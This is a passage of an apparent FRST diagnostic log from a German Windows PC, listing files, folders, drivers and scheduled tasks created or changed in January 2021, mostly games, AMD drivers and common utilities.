2021-01-11 19:41 - 2021-01-11 19:41 - 000000000 ____D C:\ProgramData\X360CE
2021-01-11 15:37 - 2021-01-11 15:37 - 000002964 _____ C:\Windows\system32\Tasks\Driver Booster SkipUAC (Teemida)
2021-01-11 14:14 - 2021-01-10 20:54 - 000000000 ____D C:\Users\dkads\Downloads\IPTV-GERMANY
2021-01-11 14:09 - 2021-01-11 21:11 - 000000000 ____D C:\Users\dkads\AppData\Roaming\vlc
2021-01-11 12:56 - 2021-01-11 12:56 - 000000000 ____D C:\Users\dkads\AppData\Roaming\SmartSteamEmu
2021-01-11 12:45 - 2021-01-11 12:46 - 000000000 ____D C:\Users\dkads\Documents\GTA San Andreas User Files
2021-01-11 12:43 - 2021-01-11 12:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Grand Theft Auto San Andreas
2021-01-11 11:50 - 2021-01-11 11:50 - 000000000 ____D C:\Users\dkads\Documents\Elder Scrolls Online
2021-01-11 11:50 - 2021-01-11 11:50 - 000000000 ____D C:\ProgramData\Elder Scrolls Online
2021-01-11 09:43 - 2021-01-11 09:45 - 000000000 ____D C:\Users\dkads\AppData\Roaming\DarkSoulsIII
2021-01-11 07:57 - 2021-01-11 08:00 - 000000000 ____D C:\Users\dkads\Documents\The Witcher 3
2021-01-10 12:33 - 2021-01-12 18:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Building Simulator
2021-01-10 11:52 - 2021-01-10 11:52 - 000000493 _____ C:\Users\dkads\Desktop\Energieoptionen.lnk
2021-01-09 22:00 - 2021-01-09 22:00 - 000002428 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brave.lnk
2021-01-09 22:00 - 2021-01-09 22:00 - 000000000 ____D C:\Program Files\BraveSoftware
2021-01-09 21:59 - 2021-01-09 22:00 - 000000000 ____D C:\Users\dkads\AppData\Local\BraveSoftware
2021-01-09 21:59 - 2021-01-09 21:59 - 000003650 _____ C:\Windows\system32\Tasks\BraveSoftwareUpdateTaskMachineUA
2021-01-09 21:59 - 2021-01-09 21:59 - 000003526 _____ C:\Windows\system32\Tasks\BraveSoftwareUpdateTaskMachineCore
2021-01-09 21:59 - 2021-01-09 21:59 - 000000000 ____D C:\Program Files (x86)\BraveSoftware
2021-01-09 21:58 - 2021-01-12 18:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Shark007 Codecs
2021-01-09 21:58 - 2021-01-09 21:58 - 000000000 ____D C:\ProgramData\Standard
2021-01-09 21:58 - 2019-02-24 14:05 - 000267992 _____ (Alexander Roshal) C:\Windows\system32\unrar.dll
2021-01-09 21:58 - 2007-02-05 19:05 - 000000038 _____ C:\Windows\AviSplitter.INI
2021-01-09 19:45 - 2021-01-09 19:45 - 000000000 ____D C:\Users\Public\Documents\Steam
2021-01-09 19:45 - 2021-01-09 19:45 - 000000000 ____D C:\Users\dkads\AppData\Local\KojimaProductions
2021-01-09 19:00 - 2021-01-09 19:00 - 000000000 ____D C:\Users\dkads\AppData\Local\Remedy
2021-01-09 18:38 - 2021-01-14 14:32 - 000000000 ____D C:\Users\dkads\AppData\Local\Vivox
2021-01-09 18:29 - 2013-05-19 01:02 - 000039168 _____ (Scarlet.Crush Productions) C:\Windows\system32\Drivers\ScpVBus.sys
2021-01-09 18:05 - 2021-01-09 18:05 - 000003376 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2574429152-671371520-428654442-1002
2021-01-09 14:18 - 2021-01-09 14:22 - 000000000 ____D C:\ProgramData\ProtonVPN
2021-01-09 14:18 - 2021-01-09 14:18 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ProtonVPN
2021-01-09 14:17 - 2021-01-09 14:22 - 000000000 ____D C:\Users\dkads\AppData\Local\ProtonVPN
2021-01-09 14:17 - 2021-01-09 14:18 - 000000000 ____D C:\Program Files (x86)\Proton Technologies
2021-01-08 18:53 - 2021-01-08 18:53 - 000000000 ____D C:\Users\dkads\OneDrive
2021-01-08 15:59 - 2021-01-09 17:34 - 000000000 ____D C:\Users\dkads\AppData\Local\PlaceholderTileLogoFolder
2021-01-08 15:46 - 2021-01-08 16:07 - 000000512 _____ C:\Windows\system32\Drivers\etc\hosts.ics
2021-01-08 15:34 - 2021-01-08 15:34 - 002755584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2021-01-08 15:34 - 2021-01-08 15:34 - 002755584 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2021-01-08 15:34 - 2021-01-08 15:34 - 002260480 _____ C:\Windows\system32\TextInputMethodFormatter.dll
2021-01-08 15:34 - 2021-01-08 15:34 - 001822272 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2021-01-08 15:34 - 2021-01-08 15:34 - 001393496 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2021-01-08 15:34 - 2021-01-08 15:34 - 001333248 _____ C:\Windows\SysWOW64\TextInputMethodFormatter.dll
2021-01-08 15:34 - 2021-01-08 15:34 - 000363520 _____ C:\Windows\system32\Windows.Internal.UI.Shell.WindowTabManager.dll
2021-01-08 15:34 - 2021-01-08 15:34 - 000287232 _____ C:\Windows\system32\CoreMas.dll
2021-01-08 15:34 - 2021-01-08 15:34 - 000266240 _____ C:\Windows\SysWOW64\Windows.Internal.UI.Shell.WindowTabManager.dll
2021-01-08 15:34 - 2021-01-08 15:34 - 000240640 _____ C:\Windows\SysWOW64\CoreMas.dll
2021-01-08 15:34 - 2021-01-08 15:34 - 000165376 _____ C:\Windows\system32\DataStoreCacheDumpTool.exe
2021-01-08 15:34 - 2021-01-08 15:34 - 000102912 _____ (Microsoft Corporation) C:\Windows\system32\ncpa.cpl
2021-01-08 15:34 - 2021-01-08 15:34 - 000100864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncpa.cpl
2021-01-08 15:34 - 2021-01-08 15:34 - 000089088 _____ C:\Windows\system32\windows.applicationmodel.conversationalagent.proxystub.dll
2021-01-08 15:34 - 2021-01-08 15:34 - 000073216 _____ C:\Windows\system32\windows.applicationmodel.conversationalagent.internal.proxystub.dll
2021-01-08 15:34 - 2021-01-08 15:34 - 000060928 _____ C:\Windows\system32\runexehelper.exe
2021-01-08 15:34 - 2021-01-08 15:34 - 000048640 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2021-01-08 15:34 - 2021-01-08 15:34 - 000039936 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2021-01-08 15:34 - 2021-01-08 15:34 - 000013312 _____ C:\Windows\system32\agentactivationruntimestarter.exe
2021-01-08 15:34 - 2021-01-08 15:34 - 000010912 _____ C:\Windows\system32\DrtmAuthTxt.wim
2021-01-08 15:34 - 2021-01-08 15:34 - 000010752 _____ C:\Windows\SysWOW64\agentactivationruntimestarter.exe
2021-01-08 15:34 - 2021-01-08 15:34 - 000001370 _____ C:\Windows\system32\ThirdPartyNoticesBySHS.txt
2021-01-08 15:31 - 2021-01-08 15:31 - 000000000 ____D C:\Users\dkads\AppData\Local\TP-Link
2021-01-08 15:17 - 2021-01-11 19:22 - 000000000 ____D C:\Users\Public\Documents\Winstep
2021-01-08 15:17 - 2021-01-08 15:19 - 000000000 ____D C:\Program Files (x86)\Winstep
2021-01-08 15:17 - 2021-01-08 15:17 - 000001131 _____ C:\Users\dkads\Documents\Winstep.lnk
2021-01-08 15:17 - 2021-01-08 15:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winstep
2021-01-08 15:17 - 2008-02-05 14:36 - 000798208 _____ (Winstep Software Technologies) C:\Windows\SysWOW64\NextControls.ocx
2021-01-08 15:17 - 2000-05-22 16:58 - 000608448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comctl32.ocx
2021-01-08 15:17 - 1997-07-19 15:55 - 001347344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvbvm50.dll
2021-01-08 15:07 - 2021-01-08 15:07 - 000000000 ____D C:\Users\dkads\AppData\Local\bifrost
2021-01-08 15:05 - 2021-01-08 15:05 - 000000000 ____D C:\Users\dkads\Documents\My Games
2021-01-08 14:43 - 2021-01-14 15:14 - 000000000 ____D C:\Program Files\PeerBlock
2021-01-08 14:43 - 2021-01-08 14:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PeerBlock
2021-01-08 14:41 - 2021-01-14 16:16 - 000000000 ____D C:\Users\dkads\AppData\Roaming\TeraCopy
2021-01-08 14:39 - 2021-01-08 15:17 - 000000000 ____D C:\Users\dkads\AppData\Roaming\PeaZip
2021-01-08 14:39 - 2021-01-08 14:39 - 000001725 _____ C:\ProgramData\Microsoft\Windows\Start Menu\TeraCopy.lnk
2021-01-08 14:39 - 2021-01-08 14:39 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PeaZip
2021-01-08 14:39 - 2021-01-08 14:39 - 000000000 ____D C:\Program Files\TeraCopy
2021-01-08 14:39 - 2021-01-08 14:39 - 000000000 ____D C:\Program Files\PeaZip
2021-01-08 14:38 - 2021-01-08 14:38 - 000002156 _____ C:\Users\dkads\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\f.lux.lnk
2021-01-08 14:38 - 2021-01-08 14:38 - 000000000 ____D C:\Users\dkads\AppData\Local\FluxSoftware
2021-01-08 13:31 - 2021-01-08 13:31 - 000466456 _____ (Creative Labs) C:\Windows\system32\wrap_oal.dll
2021-01-08 13:31 - 2021-01-08 13:31 - 000444952 _____ (Creative Labs) C:\Windows\SysWOW64\wrap_oal.dll
2021-01-08 13:31 - 2021-01-08 13:31 - 000122904 _____ (Portions (C) Creative Labs Inc. and NVIDIA Corp.) C:\Windows\system32\OpenAL32.dll
2021-01-08 13:31 - 2021-01-08 13:31 - 000109080 _____ (Portions (C) Creative Labs Inc. and NVIDIA Corp.) C:\Windows\SysWOW64\OpenAL32.dll
2021-01-08 13:31 - 2021-01-08 13:31 - 000000000 ____D C:\Program Files (x86)\OpenAL
2021-01-08 13:30 - 2021-01-08 13:30 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2021-01-08 13:30 - 2021-01-08 13:30 - 000000000 ____D C:\Program Files (x86)\Microsoft XNA
2021-01-08 13:29 - 2021-01-08 13:29 - 000000000 ____D C:\Program Files\Microsoft Silverlight
2021-01-08 13:29 - 2021-01-08 13:29 - 000000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2021-01-08 13:28 - 2021-01-08 13:28 - 001171552 _____ (Realtek ) C:\Windows\system32\Drivers\rt640x64.sys
2021-01-08 13:27 - 2021-01-08 13:27 - 000085704 _____ (Advanced Micro Devices) C:\Windows\system32\Drivers\amd_sata.sys
2021-01-08 13:27 - 2021-01-08 13:27 - 000043720 _____ (Advanced Micro Devices) C:\Windows\system32\Drivers\amd_xata.sys
2021-01-08 13:22 - 2021-01-08 13:22 - 000000000 ____R C:\Windows\SysWOW64\version_IObitDel.dll
2021-01-08 13:21 - 2021-01-11 15:37 - 000003186 _____ C:\Windows\system32\Tasks\Driver Booster Update
2021-01-08 13:21 - 2021-01-08 13:21 - 000002952 _____ C:\Windows\system32\Tasks\Driver Booster SkipUAC (dkads)
2021-01-08 13:21 - 2021-01-08 13:21 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Driver Booster 8
2021-01-08 13:21 - 2021-01-08 13:21 - 000000000 ____D C:\Program Files (x86)\IObit
2021-01-08 13:09 - 2021-01-14 12:51 - 000000000 ____D C:\Users\dkads\AppData\Roaming\qBittorrent
2021-01-08 13:09 - 2021-01-08 13:09 - 000000000 ____D C:\Users\dkads\AppData\Local\qBittorrent
2021-01-08 13:03 - 2021-01-14 13:05 - 000000000 ____D C:\Users\dkads\Desktop\Games
2021-01-08 12:34 - 2021-01-08 12:34 - 000000000 ____D C:\Users\dkads\AppData\Local\1usmus
2021-01-08 12:32 - 2021-01-08 12:32 - 000014608 _____ (ATI Technologies Inc.) C:\Windows\SysWOW64\Drivers\ssgdio64.sys
2021-01-08 12:31 - 2021-01-08 12:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2021-01-08 12:30 - 2021-01-08 12:30 - 000000000 ____D C:\Program Files\VideoLAN
2021-01-08 12:20 - 2021-01-08 12:20 - 000051272 _____ (WiseCleaner.com) C:\Windows\WiseRegNotify.sys
2021-01-08 12:20 - 2021-01-08 12:20 - 000033864 _____ (wisecleaner.com) C:\Windows\WiseHDInfo64.dll
2021-01-08 12:17 - 2021-01-13 14:24 - 000000000 ____D C:\Users\dkads\AppData\Local\AMD_Common
2021-01-08 12:16 - 2021-01-12 20:27 - 000000000 ____D C:\Users\dkads\AppData\Local\NVIDIA Corporation
2021-01-08 12:15 - 2021-01-08 12:15 - 000000000 ____D C:\Users\dkads\AppData\Local\PeerDistRepub
2021-01-08 12:14 - 2021-01-09 18:47 - 000000000 ____D C:\Users\dkads\AppData\Local\EpicGamesLauncher
2021-01-08 12:14 - 2021-01-08 18:16 - 000000000 ____D C:\Users\dkads\AppData\Roaming\Wise Care 365
2021-01-08 12:14 - 2021-01-08 15:06 - 000000000 ____D C:\Users\dkads\AppData\Local\UnrealEngine
2021-01-08 12:14 - 2021-01-08 12:16 - 000000000 ____D C:\ProgramData\Epic
2021-01-08 12:14 - 2021-01-08 12:14 - 000001272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk
2021-01-08 12:14 - 2021-01-08 12:14 - 000000000 ____D C:\Users\dkads\AppData\Local\UnrealEngineLauncher
2021-01-08 12:14 - 2021-01-08 12:14 - 000000000 ____D C:\Program Files (x86)\Epic Games
2021-01-08 12:11 - 2021-01-08 12:11 - 000000000 ____D C:\Users\dkads\AppData\Local\Steam
2021-01-08 12:11 - 2021-01-08 12:11 - 000000000 ____D C:\Users\dkads\AppData\Local\CEF
2021-01-08 12:07 - 2021-01-08 12:08 - 000000000 ____D C:\Windows\system32\MRT
2021-01-08 12:03 - 2021-01-08 13:23 - 000000000 ____D C:\ProgramData\ProductData
2021-01-08 12:03 - 2021-01-08 12:16 - 000000000 ____D C:\Users\dkads\AppData\Local\cache
2021-01-08 12:03 - 2021-01-08 12:03 - 000000000 ____D C:\Users\dkads\AppData\Roaming\AMD
2021-01-08 12:03 - 2021-01-08 12:03 - 000000000 ____D C:\Users\dkads\AppData\Local\setup
2021-01-08 12:03 - 2021-01-08 12:03 - 000000000 ____D C:\Program Files (x86)\AMD
2021-01-08 12:02 - 2021-01-14 16:16 - 000000000 ____D C:\Users\dkads\Desktop\Programme
2021-01-08 12:02 - 2021-01-12 19:56 - 000000000 ____D C:\Users\dkads\AppData\Local\PrivaZer
2021-01-08 12:02 - 2021-01-08 12:02 - 000001966 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PrivaZer.lnk
2021-01-08 12:02 - 2021-01-08 12:02 - 000000000 ____D C:\Users\Public\Foxit Software
2021-01-08 12:02 - 2021-01-08 12:02 - 000000000 ____D C:\Users\dkads\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PrivaZer
2021-01-08 12:02 - 2021-01-08 12:02 - 000000000 ____D C:\Users\dkads\AppData\Roaming\Foxit Software
2021-01-08 12:02 - 2021-01-08 12:02 - 000000000 ____D C:\Users\dkads\AppData\Roaming\Foxit AgentInformation
2021-01-08 12:02 - 2021-01-08 12:02 - 000000000 ____D C:\ProgramData\privazer
2021-01-08 12:02 - 2021-01-08 12:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Foxit Reader
2021-01-08 12:02 - 2021-01-08 12:02 - 000000000 ____D C:\ProgramData\Foxit Software
2021-01-08 12:02 - 2021-01-08 12:02 - 000000000 ____D C:\ProgramData\Foxit ContentPlatform
2021-01-08 12:02 - 2021-01-08 12:02 - 000000000 ____D C:\Program Files (x86)\PrivaZer
2021-01-08 12:01 - 2021-01-08 12:01 - 000003126 _____ C:\Windows\system32\Tasks\AMDInstallLauncher
2021-01-08 12:01 - 2021-01-08 12:01 - 000003106 _____ C:\Windows\system32\Tasks\AMDLinkUpdate
2021-01-08 12:01 - 2021-01-08 12:01 - 000000000 ____D C:\Program Files (x86)\Foxit Software
2021-01-08 12:00 - 2021-01-14 12:56 - 000000000 ____D C:\ProgramData\Package Cache
2021-01-08 12:00 - 2021-01-08 12:00 - 000003160 _____ C:\Windows\system32\Tasks\StartCN
2021-01-08 12:00 - 2021-01-08 12:00 - 000003080 _____ C:\Windows\system32\Tasks\StartDVR
2021-01-08 12:00 - 2021-01-08 12:00 - 000000000 ____D C:\Users\dkads\AppData\Local\Comms
2021-01-08 12:00 - 2021-01-08 12:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Radeon Software
2021-01-08 12:00 - 2021-01-08 12:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Bug Report Tool
2021-01-08 11:59 - 2021-01-08 11:59 - 000000000 ____D C:\Users\dkads\AppData\Local\RadeonInstaller
2021-01-08 11:59 - 2021-01-08 11:59 - 000000000 ____D C:\ProgramData\AMD
2021-01-08 11:58 - 2021-01-14 16:14 - 000000000 ____D C:\Users\dkads\AppData\Local\ClassicShell
2021-01-08 11:58 - 2021-01-08 11:58 - 000000000 ____D C:\Users\dkads\AppData\Roaming\ClassicShell
2021-01-08 11:58 - 2021-01-08 11:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Classic Shell
2021-01-08 11:58 - 2021-01-08 11:58 - 000000000 ____D C:\Program Files\Classic Shell
2021-01-08 11:55 - 2021-01-13 15:31 - 000000000 ____D C:\Program Files (x86)\Steam
2021-01-08 11:55 - 2021-01-08 11:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wise Care 365
2021-01-08 11:55 - 2021-01-08 11:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2021-01-08 11:55 - 2021-01-08 11:55 - 000000000 ____D C:\Program Files (x86)\Wise
2021-01-08 11:54 - 2021-01-14 15:26 - 000000000 ____D C:\Users\dkads\AppData\Roaming\IObit
2021-01-08 11:54 - 2021-01-08 12:14 - 000000000 ____D C:\Users\dkads\AppData\Roaming\discord
2021-01-08 11:54 - 2021-01-08 12:03 - 000000000 ____D C:\Users\dkads\AppData\LocalLow\IObit
2021-01-08 11:54 - 2021-01-08 12:03 - 000000000 ____D C:\ProgramData\IObit
2021-01-08 11:54 - 2021-01-08 11:54 - 000000000 ____D C:\Users\dkads\AppData\Roaming\WinRAR
2021-01-08 11:54 - 2021-01-08 11:54 - 000000000 ____D C:\Users\dkads\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc
2021-01-08 11:54 - 2021-01-08 11:54 - 000000000 ____D C:\Users\dkads\AppData\Local\SquirrelTemp
2021-01-08 11:54 - 2021-01-08 11:54 - 000000000 ____D C:\Users\dkads\AppData\Local\Discord
2021-01-08 11:54 - 2021-01-08 11:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qBittorrent
2021-01-08 11:54 - 2021-01-08 11:54 - 000000000 ____D C:\Program Files\qBittorrent
2021-01-08 11:49 - 2021-01-14 16:17 - 000000000 ____D C:\ProgramData\Mozilla
2021-01-08 11:49 - 2021-01-14 16:16 - 000000000 ____D C:\Users\dkads\AppData\LocalLow\Mozilla
2021-01-08 11:49 - 2021-01-14 15:44 - 000000000 ____D C:\Users\dkads\AppData\Local\Mozilla Firefox
2021-01-08 11:49 - 2021-01-08 11:49 - 000001273 _____ C:\Users\dkads\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-08 11:49 - 2021-01-08 11:49 - 000000000 ____D C:\Windows\system32\Tasks\Mozilla
2021-01-08 11:49 - 2021-01-08 11:49 - 000000000 ____D C:\Users\dkads\AppData\Roaming\Mozilla
2021-01-08 11:49 - 2021-01-08 11:49 - 000000000 ____D C:\Users\dkads\AppData\Local\Mozilla
2021-01-08 11:47 - 2021-01-13 15:14 - 000000000 ____D C:\Users\dkads\AppData\Local\D3DSCache
2021-01-08 11:47 - 2021-01-13 15:05 - 000000000 ____D C:\Users\dkads\AppData\Local\VirtualStore
2021-01-08 11:47 - 2021-01-09 14:54 - 000000000 ____D C:\Users\dkads\AppData\Local\Packages
2021-01-08 11:47 - 2021-01-08 12:16 - 000000000 ____D C:\Users\dkads\AppData\Local\AMD
2021-01-08 11:47 - 2021-01-08 12:10 - 000000000 ____D C:\Users\dkads\AppData\Local\ConnectedDevicesPlatform
2021-01-08 11:47 - 2021-01-08 11:47 - 000000000 ___RD C:\Users\dkads\3D Objects
2021-01-08 11:47 - 2021-01-08 11:47 - 000000000 ____D C:\Users\dkads\AppData\Roaming\Adobe
2021-01-08 11:47 - 2021-01-08 11:47 - 000000000 ____D C:\Users\dkads\AppData\LocalLow\AMD
2021-01-08 11:47 - 2021-01-08 11:47 - 000000000 ____D C:\Users\dkads\AppData\Local\Publishers
2021-01-08 11:46 - 2021-01-14 16:19 - 001632020 _____ C:\Windows\system32\PerfStringBackup.INI
2021-01-08 11:45 - 2021-01-14 16:14 - 000065536 _____ C:\Windows\system32\spu_storage.bin
2021-01-08 11:45 - 2021-01-09 21:58 - 000000000 ____D C:\Users\dkads
2021-01-08 11:45 - 2021-01-08 12:00 - 000000000 ____D C:\Program Files\AMD
2021-01-08 11:45 - 2021-01-08 11:45 - 000000020 ___SH C:\Users\dkads\ntuser.ini
2021-01-08 11:45 - 2021-01-08 11:45 - 000000000 _SHDL C:\Users\dkads\Vorlagen
2021-01-08 11:45 - 2021-01-08 11:45 - 000000000 _SHDL C:\Users\dkads\Startmenü
2021-01-08 11:45 - 2021-01-08 11:45 - 000000000 _SHDL C:\Users\dkads\Netzwerkumgebung
2021-01-08 11:45 - 2021-01-08 11:45 - 000000000 _SHDL C:\Users\dkads\Lokale Einstellungen
2021-01-08 11:45 - 2021-01-08 11:45 - 000000000 _SHDL C:\Users\dkads\Eigene Dateien
2021-01-08 11:45 - 2021-01-08 11:45 - 000000000 _SHDL C:\Users\dkads\Druckumgebung
2021-01-08 11:45 - 2021-01-08 11:45 - 000000000 _SHDL C:\Users\dkads\Documents\Eigene Videos
2021-01-08 11:45 - 2021-01-08 11:45 - 000000000 _SHDL C:\Users\dkads\Documents\Eigene Musik
2021-01-08 11:45 - 2021-01-08 11:45 - 000000000 _SHDL C:\Users\dkads\Documents\Eigene Bilder
2021-01-08 11:45 - 2021-01-08 11:45 - 000000000 _SHDL C:\Users\dkads\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2021-01-08 11:45 - 2021-01-08 11:45 - 000000000 _SHDL C:\Users\dkads\AppData\Local\Verlauf
2021-01-08 11:45 - 2021-01-08 11:45 - 000000000 _SHDL C:\Users\dkads\AppData\Local\Anwendungsdaten
2021-01-08 11:45 - 2021-01-08 11:45 - 000000000 _SHDL C:\Users\dkads\Anwendungsdaten
2021-01-08 11:45 - 2021-01-08 11:45 - 000000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_amdpsp_01011.Wdf
2021-01-08 11:45 - 2020-12-07 21:43 - 000107048 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\Drivers\amdkmpfd.sys
2021-01-08 11:44 - 2021-01-08 11:44 - 000000000 ____D C:\Windows\system32\AMD
2021-01-08 11:44 - 2020-12-07 21:44 - 001798456 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\atiadlxx.dll
2021-01-08 11:44 - 2020-12-07 21:43 - 000202640 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\amdihk64.dll
2021-01-08 11:44 - 2020-12-07 21:43 - 000170192 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\amdihk32.dll
2021-01-08 11:44 - 2020-10-29 13:31 - 000553584 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdmcl64.dll
2021-01-08 11:44 - 2020-10-29 13:31 - 000383600 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdmcl32.dll
2021-01-08 11:44 - 2020-10-29 12:29 - 000154384 _____ C:\Windows\system32\samu_krnl_ci.sbin
2021-01-08 11:44 - 2020-10-29 12:29 - 000138832 _____ C:\Windows\system32\samu_krnl_isv_ci.sbin
2021-01-08 11:44 - 2020-10-29 12:29 - 000125488 _____ C:\Windows\system32\kapp_ci.sbin
2021-01-08 11:44 - 2020-10-29 12:29 - 000121168 _____ C:\Windows\system32\kapp_si.sbin
2021-01-08 11:44 - 2020-10-29 12:28 - 000204952 _____ C:\Windows\SysWOW64\ativvsvl.dat
2021-01-08 11:44 - 2020-10-29 12:28 - 000204952 _____ C:\Windows\system32\ativvsvl.dat
2021-01-08 11:44 - 2020-10-29 12:28 - 000157144 _____ C:\Windows\SysWOW64\ativvsva.dat
2021-01-08 11:44 - 2020-10-29 12:28 - 000157144 _____ C:\Windows\system32\ativvsva.dat
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Public\Documents\Eigene Videos
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Public\Documents\Eigene Musik
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Public\Documents\Eigene Bilder
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default\Vorlagen
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default\Startmenü
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default\Netzwerkumgebung
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default\Lokale Einstellungen
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default\Eigene Dateien
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default\Druckumgebung
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default\Documents\Eigene Videos
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default\Documents\Eigene Musik
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default\Documents\Eigene Bilder
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default\AppData\Local\Verlauf
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default\AppData\Local\Anwendungsdaten
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default\Anwendungsdaten
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default User\Vorlagen
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default User\Startmenü
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default User\Netzwerkumgebung
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default User\Lokale Einstellungen
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default User\Eigene Dateien
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default User\Druckumgebung
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default User\Documents\Eigene Videos
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default User\Documents\Eigene Musik
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default User\Documents\Eigene Bilder
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default User\AppData\Local\Verlauf
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default User\AppData\Local\Anwendungsdaten
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Users\Default User\Anwendungsdaten
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Programme
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\ProgramData\Vorlagen
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\ProgramData\Startmenü
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\ProgramData\Microsoft\Windows\Start Menu\Programme
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\ProgramData\Dokumente
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\ProgramData\Anwendungsdaten
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 _SHDL C:\Dokumente und Einstellungen
2021-01-08 11:42 - 2021-01-08 11:42 - 000000000 ____D C:\Windows\CSC
2021-01-08 11:40 - 2021-01-14 16:14 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-08 11:40 - 2021-01-08 11:40 - 000002850 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2574429152-671371520-428654442-500
2021-01-08 11:39 - 2021-01-11 08:55 - 000000000 ____D C:\Windows\Panther

==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2021-01-14 16:19 - 2019-12-07 15:51 - 000705928 _____ C:\Windows\system32\perfh007.dat
